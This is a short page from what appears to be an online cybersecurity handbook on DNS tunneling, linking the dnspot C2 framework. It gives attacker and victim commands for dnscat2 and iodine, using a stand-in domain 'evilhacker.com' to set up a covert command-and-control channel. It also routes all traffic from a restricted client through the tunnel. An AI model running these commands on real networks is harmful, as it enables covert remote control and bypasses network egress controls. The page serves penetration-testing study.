CYBERSECURITY BOOK

⌘Ctrlk

DNS Tunneling

GitHub - mosajjal/dnspot: End-to-end Encrypted DNS Tunnelling and C2 frameworkGitHub

Dnscat2

# Attacker
sudo dnscat2-server --dns domain=evilhacker.com

# Victim
dnscat2 --dns domain=evilhacker.com

Commands

Iodine

References

PreviousDNS Exfiltration NextTCP/UDP Tunneling

Last updated 1 year ago

# Attacker
sudo iodined 192.168.100.1 evilhacker.com -P password1

# Client (Not allowed to access internet)
# Creating a layer 3 vpn tunnel
sudo iodine evilhacker.com -P password1

sudo route add -net 0.0.0.0/0 gw 192.168.100.1 dns0

# now ping using the client machine
ping google.com

SUCCESS!